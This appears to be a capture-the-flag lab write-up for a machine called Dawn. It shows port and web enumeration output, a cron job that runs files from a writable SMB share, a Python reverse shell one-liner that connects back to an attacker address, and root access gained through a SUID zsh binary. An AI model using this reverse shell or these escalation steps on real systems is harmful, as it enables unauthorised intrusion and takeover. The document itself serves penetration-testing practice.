# Enumeration
## NMAP
IP = 192.168.224.11
```nmap
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, FoundRows, Support41Auth, IgnoreSigpipes, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, SupportsCompression, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: U0/=#8.~QZO]d_0oaxX.
|_  Auth Plugin Name: mysql_native_password
Service Info: Host: DAWN

Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2021-09-15T01:50:39-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-15T05:50:39
|_  start_date: N/A

```
## SMB 
- SMB version is Samba 4.9.5-Debian
```bash
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
```
- We have read-write permission to the important share.

## Web
### Nikto
```bash
 Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 317, size: 58f2eb81ffb49, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3268: /logs/: Directory indexing found.
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.

```
### Feroxbuster
```bash
301        9l       28w      315c http://192.168.224.11/logs
403       11l       32w      302c http://192.168.224.11/server-status
301        9l       28w      315c http://192.168.224.11/cctv
```
- We only can read `management.log` in logs
```bash
2020/08/12 09:49:01 [31;1mCMD: UID=1000 PID=1844   | /bin/sh -c /home/dawn/ITDEPT/product-control [0m
2020/08/12 09:49:01 [31;1mCMD: UID=33   PID=1843   | /bin/sh -c /home/dawn/ITDEPT/web-control [0m
2020/08/12 09:49:01 [31;1mCMD: UID=33   PID=1839   | /bin/sh -c /home/dawn/ITDEPT/web-control [0m
2020/08/12 09:49:01 [31;1mCMD: UID=1000 PID=1838   | /bin/sh -c /home/dawn/ITDEPT/product-control [0m
2020/08/12 09:49:30 [31;
```
- Looks like a cronjob.
It's running the files in the share executing the files in the sare?

# Exploit
- Since we can upload any files in the folder, we can try uploading a reverse shell.
- I tried a lot of reverse shell and some just doesn't work (even mkfifo!)
- But a python reverse shell works.
```py
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.49.224",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
```
- We are user dawn and we can grab local.txt
`f647256611035a2449ffdbc5a38dc500`

# Privilege Escalation.
- We are user dawn, dawn can run sudo
```bash
dawn@dawn:~$ sudo -l
Matching Defaults entries for dawn on dawn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dawn may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/mysql
```
- We can sudo on mysql but we need a password.

## Linpeas enumeration
- Found an unusual SUID bit.
```bash
-rwsr-xr-x 1 root root 842K Feb  4  2019 /usr/bin/zsh
```
- We can simply run `zsh -p` to gain root privileges.
- Proof.txt
`7a1322f6407e6029e3318df196342a8d`

